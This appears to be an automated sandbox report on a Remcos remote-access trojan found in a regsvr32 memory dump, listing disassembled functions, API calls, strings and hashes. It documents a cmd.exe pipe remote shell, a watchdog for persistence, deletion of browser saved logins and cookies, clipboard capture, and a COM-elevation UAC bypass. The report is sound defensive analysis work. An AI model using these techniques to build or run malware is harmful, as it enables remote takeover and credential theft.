                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: f9f4039d61f4a6a14bd31acb51cbfb3fcd6b7f21bf5783f801e5d1602d970925
                                      • Instruction ID: 7335e72961737b79b72bceab3232151ef91881e2553b8758bd9c292e3d780b20
                                      • Opcode Fuzzy Hash: f9f4039d61f4a6a14bd31acb51cbfb3fcd6b7f21bf5783f801e5d1602d970925
                                      • Instruction Fuzzy Hash: 5A01FC32A46333DFC7214B78BC84A5B77A9AF84761B110924FD05D7140DF34D911CAE1
                                      Function 02A484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 486 2a484ca-2a484f4 487 2a484f6-2a484f8 486->487 488 2a4855f 486->488 489 2a484fe-2a48504 487->489 490 2a484fa-2a484fc 487->490 491 2a48561-2a48565 488->491 492 2a48506-2a48508 call 2a48566 489->492 493 2a48520 489->493 490->491 498 2a4850d-2a48510 492->498 494 2a48522-2a48524 493->494 496 2a48526-2a48534 GetProcAddress 494->496 497 2a4854f-2a4855d 494->497 499 2a48536-2a4853f call 2a3436e 496->499 500 2a48549 496->500 497->488 501 2a48541-2a48547 498->501 502 2a48512-2a48518 498->502 499->490 500->497 501->494 502->492 504 2a4851a 502->504 504->493
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 02A4852A
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 02A48537
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: 295700d425a2b1bf4e6aa0c15b2b6bfe97f9bf3ab8d93039d703a488c2243e28
                                      • Instruction ID: 306233dec1e470ca78dfb6b810ea764102a09a9ccc16b04209267828fe32e192
                                      • Opcode Fuzzy Hash: 295700d425a2b1bf4e6aa0c15b2b6bfe97f9bf3ab8d93039d703a488c2243e28
                                      • Instruction Fuzzy Hash: E411CA37A415219F9B22DF1CFC8095A73D6EBC4B24B164560FD19BB244DF34EC1286D1
                                      Function 02A0165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 506 2a0165e-2a01664 507 2a01666-2a01668 506->507 508 2a01669-2a01674 506->508 509 2a01676 508->509 510 2a0167b-2a01685 508->510 509->510 511 2a01687-2a0168d 510->511 512 2a016a8-2a016a9 call 2a344ea 510->512 511->512 513 2a0168f-2a01694 511->513 515 2a016ae-2a016af 512->515 513->509 516 2a01696-2a016a6 call 2a344ea 513->516 517 2a016b1-2a016b3 515->517 516->517
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction ID: 2c483f97097fa640d780bbec032a9981e600a634b8e4f5ee87f0435d0e5730d9
                                      • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                      • Instruction Fuzzy Hash: 81F082B06052015ADB1D8B74EDE4BAA77965B84365F588B2DF01EC60D0DF30C895CA08
                                      Function 02A0D069 Relevance: 3.0, APIs: 2, Instructions: 13synchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 520 2a0d069-2a0d095 call 2a01fab CreateMutexA GetLastError
                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,02A0EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,02A660BC,00000003,00000000), ref: 02A0D078
                                      • GetLastError.KERNEL32 ref: 02A0D083
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorLastMutex
                                      • String ID:
                                      • API String ID: 1925916568-0
                                      • Opcode ID: 054bc7e645ce67b558a3276af3ac757095caa3d399b11a09f193ecd60d98a2fe
                                      • Instruction ID: c339d32e2cc717f9d2a5dc4e038fc02295a895c4afa89ba781ba48ebac351f3e
                                      • Opcode Fuzzy Hash: 054bc7e645ce67b558a3276af3ac757095caa3d399b11a09f193ecd60d98a2fe
                                      • Instruction Fuzzy Hash: B9D012B0E84311DBD7081770E99975F39959744701F80081AF907CD9D0CE68C4A18915
                                      Function 02A500D4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 523 2a500d4-2a500e1 call 2a45af3 525 2a500e6-2a500f1 523->525 526 2a500f7-2a500ff 525->526 527 2a500f3-2a500f5 525->527 528 2a5013f-2a5014d call 2a46782 526->528 529 2a50101-2a50105 526->529 527->528 530 2a50107-2a50139 call 2a48a84 529->530 535 2a5013b-2a5013e 530->535 535->528
                                      APIs
                                        • Part of subcall function 02A45AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02A482CA,00000001,00000364,?,00000000,?,02A3BC87,00000000,?,?,02A3BD0B,00000000), ref: 02A45B34
                                      • _free.LIBCMT ref: 02A50140
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                      • Instruction ID: f070ad12033692744cee4c46a75551c8d995cec905fc975e7ba97543fbbdf89c
                                      • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                      • Instruction Fuzzy Hash: 7B012B725403449BE3218F69D885E5AFBD9FB89370F25062DD59443280EF70A805C674
                                      Function 02A45AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 536 2a45af3-2a45afe 537 2a45b00-2a45b0a 536->537 538 2a45b0c-2a45b12 536->538 537->538 539 2a45b40-2a45b4b call 2a405dd 537->539 540 2a45b14-2a45b15 538->540 541 2a45b2b-2a45b3c RtlAllocateHeap 538->541 546 2a45b4d-2a45b4f 539->546 540->541 542 2a45b17-2a45b1e call 2a45545 541->542 543 2a45b3e 541->543 542->539 549 2a45b20-2a45b29 call 2a42f80 542->549 543->546 549->539 549->541
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02A482CA,00000001,00000364,?,00000000,?,02A3BC87,00000000,?,?,02A3BD0B,00000000), ref: 02A45B34
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: b8eeb05da265f8865f57396f22fa8586bf58ff7c7cd7cdd6c08fab0b7b088d86
                                      • Instruction ID: b8a7e280ac151c2a5b78ac2fcbb981d88387516b3e7e91456c350c682cf91d7d
                                      • Opcode Fuzzy Hash: b8eeb05da265f8865f57396f22fa8586bf58ff7c7cd7cdd6c08fab0b7b088d86
                                      • Instruction Fuzzy Hash: 7CF0E971E8052867DB316B229C44F5BB759AFD2770BE48111EE049A080EF30D80386F0
                                      Function 02A46137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 552 2a46137-2a46143 553 2a46175-2a46180 call 2a405dd 552->553 554 2a46145-2a46147 552->554 561 2a46182-2a46184 553->561 556 2a46160-2a46171 RtlAllocateHeap 554->556 557 2a46149-2a4614a 554->557 559 2a46173 556->559 560 2a4614c-2a46153 call 2a45545 556->560 557->556 559->561 560->553 564 2a46155-2a4615e call 2a42f80 560->564 564->553 564->556
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 6ca8579889aa35e4cfde6498d9e61523961ea03eb1496758923dd68c1fa0bc60
                                      • Instruction ID: 472f51b3502c2dd68fb28c8831989f9a2d18aff9a7f4ce4f71fa557882c2e31f
                                      • Opcode Fuzzy Hash: 6ca8579889aa35e4cfde6498d9e61523961ea03eb1496758923dd68c1fa0bc60
                                      • Instruction Fuzzy Hash: 2BE09231D8022577EB22276D9D44B9B776E9FC3BB2F554221ED1697082DF20C80985F5

                                      Non-executed Functions

                                      Function 02A0569A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 02A056E6
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      • __Init_thread_footer.LIBCMT ref: 02A05723
                                      • CreatePipe.KERNEL32(02A76CCC,02A76CB4,02A76BD8,00000000,02A660BC,00000000), ref: 02A057B6
                                      • CreatePipe.KERNEL32(02A76CB8,02A76CD4,02A76BD8,00000000), ref: 02A057CC
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,02A76BE8,02A76CBC), ref: 02A0583F
                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 02A05897
                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02A058BC
                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02A058E9
                                        • Part of subcall function 02A34770: __onexit.LIBCMT ref: 02A34776
                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,02A74F90,02A660C0,00000062,02A660A4), ref: 02A059E4
                                      • Sleep.KERNEL32(00000064,00000062,02A660A4), ref: 02A059FE
                                      • TerminateProcess.KERNEL32(00000000), ref: 02A05A17
                                      • CloseHandle.KERNEL32 ref: 02A05A23
                                      • CloseHandle.KERNEL32 ref: 02A05A2B
                                      • CloseHandle.KERNEL32 ref: 02A05A3D
                                      • CloseHandle.KERNEL32 ref: 02A05A45
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                      • String ID: SystemDrive$cmd.exe
                                      • API String ID: 2994406822-3633465311
                                      • Opcode ID: 508e5f61704a8bddeaae3dc37399644e36f61ac3b898d62701700f42e79cf3b0
                                      • Instruction ID: f8520cde1798ca2ee8e5e09867860abab1ae790ec553cb2f02cde3169bd9c9fe
                                      • Opcode Fuzzy Hash: 508e5f61704a8bddeaae3dc37399644e36f61ac3b898d62701700f42e79cf3b0
                                      • Instruction Fuzzy Hash: 90919171EC4304AFE610AB25BEC4B2F7BAEFB44B40F400829F94696191DF259C198F69
                                      Function 02A120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 02A12106
                                        • Part of subcall function 02A13877: RegCreateKeyA.ADVAPI32(80000001,00000000,02A660A4), ref: 02A13885
                                        • Part of subcall function 02A13877: RegSetValueExA.ADVAPI32(02A660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02A0C152,02A66C48,00000001,000000AF,02A660A4), ref: 02A138A0
                                        • Part of subcall function 02A13877: RegCloseKey.ADVAPI32(02A660A4,?,?,?,02A0C152,02A66C48,00000001,000000AF,02A660A4), ref: 02A138AB
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 02A12146
                                      • CloseHandle.KERNEL32(00000000), ref: 02A12155
                                      • CreateThread.KERNEL32(00000000,00000000,02A127EE,00000000,00000000,00000000), ref: 02A121AB
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02A1241A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                      • API String ID: 3018269243-13974260
                                      • Opcode ID: 57deb12010830b22654116ca1b63f89924b2b51f2240ee765c326f4e7b08f6d3
                                      • Instruction ID: 04ff04c9aa18a2d367d23b4830c6284157f5a6370153a3446e83dfd588864243
                                      • Opcode Fuzzy Hash: 57deb12010830b22654116ca1b63f89924b2b51f2240ee765c326f4e7b08f6d3
                                      • Instruction Fuzzy Hash: 8C7182315843106BD614FB70EE999BFB3A6BF95724F40096FB886560D0EF609D09CEA2
                                      Function 02A0BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02A0BBAF
                                      • FindClose.KERNEL32(00000000), ref: 02A0BBC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02A0BCEC
                                      • FindClose.KERNEL32(00000000), ref: 02A0BD12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                      • API String ID: 1164774033-3681987949
                                      • Opcode ID: 4a18284e0e423d234c65972c90b4493933734831839a216e627c5cb7938f32fc
                                      • Instruction ID: 79a69d9426e1549e8fa435f0ad0acf6efdad9a8faeeb4388ad72cf0369312e03
                                      • Opcode Fuzzy Hash: 4a18284e0e423d234c65972c90b4493933734831839a216e627c5cb7938f32fc
                                      • Instruction Fuzzy Hash: 195165319802199BDB14F7B0EED9DFEB73AAF14714F40095BE406661D0EF345A8ACE91
                                      Function 02A0BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02A0BDAF
                                      • FindClose.KERNEL32(00000000), ref: 02A0BDC9
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02A0BE89
                                      • FindClose.KERNEL32(00000000), ref: 02A0BEAF
                                      • FindClose.KERNEL32(00000000), ref: 02A0BED0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$File$FirstNext
                                      • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 3527384056-432212279
                                      • Opcode ID: 2761ed202f5dcbe3b4aaac5e966117543067a0fe0ec7ddcff4de8d9ef7f95ab6
                                      • Instruction ID: 1a51c5990bfbaa05e5894d9922a72f6b7ab60af7fe2a78554cc5eefe8dae70c6
                                      • Opcode Fuzzy Hash: 2761ed202f5dcbe3b4aaac5e966117543067a0fe0ec7ddcff4de8d9ef7f95ab6
                                      • Instruction Fuzzy Hash: 9041A431980219AAEB04F7B4FED9DFEB77EAF15714F400916E506A60C0EF245A46CE91
                                      Function 02A168C1 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32 ref: 02A168C2
                                      • EmptyClipboard.USER32 ref: 02A168D0
                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 02A168F0
                                      • GlobalLock.KERNEL32(00000000), ref: 02A168F9
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02A1692F
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 02A16938
                                      • CloseClipboard.USER32 ref: 02A16955
                                      • OpenClipboard.USER32 ref: 02A1695C
                                      • GetClipboardData.USER32(0000000D), ref: 02A1696C
                                      • GlobalLock.KERNEL32(00000000), ref: 02A16975
                                      • GlobalUnlock.KERNEL32(00000000), ref: 02A1697E
                                      • CloseClipboard.USER32 ref: 02A16984
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                      • String ID:
                                      • API String ID: 3520204547-0
                                      • Opcode ID: 5c3dd18016b126dbee4dffa6a26a757c94f909479782b6e158a94a28f11011ac
                                      • Instruction ID: 1c0792734d42827913c8071cb0b3ebe22a9914c2bffddfb5f80c232211848709
                                      • Opcode Fuzzy Hash: 5c3dd18016b126dbee4dffa6a26a757c94f909479782b6e158a94a28f11011ac
                                      • Instruction Fuzzy Hash: D4213171A84311DBC714BBB1ED9CABF76AAAF84751F400C5DF506861C0EF24C919CAA2
                                      Function 02A074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 02A07521
                                      • CoGetObject.OLE32(?,00000024,02A66518,00000000), ref: 02A07582
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Object_wcslen
                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                      • API String ID: 240030777-3166923314
                                      • Opcode ID: e47921b029c548ead712da6c9fa29f7c55650d66b4b9f387fadfc8db56a2eb32
                                      • Instruction ID: 53825468eb050b3d4446e11f1e6d10bd4d6900f8aa6459ec8606b103097aac33
                                      • Opcode Fuzzy Hash: e47921b029c548ead712da6c9fa29f7c55650d66b4b9f387fadfc8db56a2eb32
                                      • Instruction Fuzzy Hash: 55118A71950214BBE711E7949D89AEEF77CEB08B10F140095F515A3140EF74AA04CAB5
                                      Function 02A1A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,02A758E8), ref: 02A1A75E
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02A1A7AD
                                      • GetLastError.KERNEL32 ref: 02A1A7BB
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02A1A7F3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                      • String ID:
                                      • API String ID: 3587775597-0
                                      • Opcode ID: bffdc3cba92217415fdae7a739cd187d6876af999e37f26ab76c4e253cc35ade
                                      • Instruction ID: f0732a5e50d3aabafcc426bacbe0cbce616c83f20937869372708f74947faded
                                      • Opcode Fuzzy Hash: bffdc3cba92217415fdae7a739cd187d6876af999e37f26ab76c4e253cc35ade
                                      • Instruction Fuzzy Hash: CE815D31548304ABC705EB60E9D4DAFB7AABF98354F50091EF58686190EF70EE09CF92
                                      Function 02A0C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 02A0C39B
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02A0C46E
                                      • FindClose.KERNEL32(00000000), ref: 02A0C47D
                                      • FindClose.KERNEL32(00000000), ref: 02A0C4A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 1164774033-405221262
                                      • Opcode ID: 002e10df7f396e404ab188cd57acceede5b74e65ad0177e15a5dfc7fe09c26bf
                                      • Instruction ID: 5e6fabedb396410cd500b855b87583a999b37af608beb16675177510c08eacd9
                                      • Opcode Fuzzy Hash: 002e10df7f396e404ab188cd57acceede5b74e65ad0177e15a5dfc7fe09c26bf
                                      • Instruction Fuzzy Hash: 84318431980219AADB15F7A0FDD8DFEB77EBF14B10F00015BA10AA20C0EF749A4ACE45
                                      Function 02A1C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,02A74EE0,?), ref: 02A1C2EC
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,02A74EE0,?), ref: 02A1C31C
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,02A74EE0,?), ref: 02A1C38E
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,02A74EE0,?), ref: 02A1C39B
                                        • Part of subcall function 02A1C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,02A74EE0,?), ref: 02A1C371
                                      • GetLastError.KERNEL32(?,?,?,?,?,02A74EE0,?), ref: 02A1C3BC
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,02A74EE0,?), ref: 02A1C3D2
                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,02A74EE0,?), ref: 02A1C3D9
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,02A74EE0,?), ref: 02A1C3E2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                      • String ID:
                                      • API String ID: 2341273852-0
                                      • Opcode ID: e8589ad3b83d67eb997c06d488bb886ff475d5139de4a2a38a54f2702e4c625c
                                      • Instruction ID: 8ec3e2ac113362d7dac72acd2236ccdd1246927ab32186be55ba25490c4e93a2
                                      • Opcode Fuzzy Hash: e8589ad3b83d67eb997c06d488bb886ff475d5139de4a2a38a54f2702e4c625c
                                      • Instruction Fuzzy Hash: 84319F72C80329AADB24E7A0DD88EDFF37EAB04320F5405E6E545D2040EF35D6858FA5
                                      Function 02A13FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02A1409D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02A140A9
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 02A1426A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02A14271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                      • API String ID: 2127411465-314212984
                                      • Opcode ID: 2d4ca199c5c8ca6aa52892a58815b503d0f7fb631ae5020734228be93866ac7a
                                      • Instruction ID: 932915b8e9b66547a10c1129fa7359bd35884f2dc0380ae0f17c08a428a1565e
                                      • Opcode Fuzzy Hash: 2d4ca199c5c8ca6aa52892a58815b503d0f7fb631ae5020734228be93866ac7a
                                      • Instruction Fuzzy Hash: 32B10871AC430067DA14FB78EED9DBF76ABAF95750F80091DF846971D0EE608908CE92
                                      Function 02A0BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 02A0BA4E
                                      • GetLastError.KERNEL32 ref: 02A0BA58
                                      Strings
                                      • UserProfile, xrefs: 02A0BA1E
                                      • [Chrome StoredLogins found, cleared!], xrefs: 02A0BA7E
                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 02A0BA19
                                      • [Chrome StoredLogins not found], xrefs: 02A0BA72
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 2018770650-1062637481
                                      • Opcode ID: faee76d8fc8aa529d19555b08383527ece08eeec7821fb51e47726c937e49741
                                      • Instruction ID: 7e0d97889d98e55fd46137146e47fc24c1386ebecd8f0a22e56404d29bcc0c45
                                      • Opcode Fuzzy Hash: faee76d8fc8aa529d19555b08383527ece08eeec7821fb51e47726c937e49741
                                      • Instruction Fuzzy Hash: 5B01D672AC02056B5B087B76FFDAEFE772AA911B04B400A16E803625D0EE159915CEE2
                                      Function 02A17952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 02A1795F
